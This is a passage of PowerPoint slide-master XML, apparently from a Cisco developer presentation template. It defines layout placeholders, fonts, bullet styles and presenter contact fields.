              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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7" y="341314"/>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200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3568392"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2591713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2_Half_Page_Text">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3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="419101" y="1657350"/>
            <a:ext cx="3827463" cy="18288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5097464" y="531812"/>
            <a:ext cx="3551237" cy="4059237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="169859" indent="-169859">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="228594" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="346067" indent="-171446">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="457189" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="574661" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="744520" indent="-112710">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="3466792"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37818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3_Half_Page_Text_2 column">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mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437767"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5097464" y="510540"/>
            <a:ext cx="3551237" cy="4080510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114297" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228594" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342892" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457189" indent="-123822">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574661" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>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37767" y="1659843"/>
            <a:ext cx="3808797" cy="2931208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="114297" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228594" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342892" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457189" indent="-123822">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574661" indent="-117472">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">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4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3359215"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219122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267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21434206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4_Half_Page_Picture_Caption">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5089526" y="531813"/>
            <a:ext cx="3559175" cy="3364846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089526" y="4062351"/>
            <a:ext cx="3559175" cy="525145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="2863168"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190848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5_Half_Page_Picture">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endParaRPr>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5089526" y="531814"/>
            <a:ext cx="3559175" cy="4059236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3263592"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60976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6_Half_Page_Headline Only">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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="2946839"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238524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7_Half_Page_Picture_Full">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4580093" y="0"/>
            <a:ext cx="4563907" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="32994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249697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8_Half_Page_Chart">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Chart Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089526" y="503238"/>
            <a:ext cx="3559175" cy="4087812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3179921"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399176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9_Half_Page_Table">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Table Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089526" y="503238"/>
            <a:ext cx="3559175" cy="4087812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3407027"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338224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Storytelling">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610100" y="609601"/>
            <a:ext cx="0" cy="3984625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat"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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463764" y="1439061"/>
            <a:ext cx="3820348" cy="2265389"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="61715" tIns="34288" rIns="61715" bIns="34288" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="685731" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Ciscolight" pitchFamily="2" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922521" y="654518"/>
            <a:ext cx="3865880" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1500"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1500"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1500"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1500"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8409709" y="4884990"/>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640853F4-1BAF-3540-A54F-96D28F764CCD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371316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ocial Media Contac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5A1BC9F-B5AD-B147-BA51-6B169F6BC974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4177122" y="1422400"/>
            <a:ext cx="2083902" cy="1959304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D4E213-7CF4-6941-B2D0-5FF593988BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6385568" y="1883898"/>
            <a:ext cx="2397686" cy="1497806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Name</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Twitter Handle</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GitHub Link</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linked In Link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB00F3A-25D3-4F4B-BAFF-D5F7DBFC5ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>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a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815769" y="1163125"/>
            <a:ext cx="2569136" cy="1859621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B81C284A-AD2A-AD43-8CC9-F51A6C7BC078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6509108" y="4313198"/>
            <a:ext cx="2411488" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="42862" lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSans ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>developer.cisco.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D3A5C"/>
              </a:solidFill>
              <a:latin typeface="CiscoSans ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7698D641-4E2F-B74D-8F84-F7779A22E4CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="496343"/>
            <a:ext cx="6574156" cy="41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8" tIns="34284" rIns="68568" bIns="34284" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="3733" b="0" i="0" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="609585" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
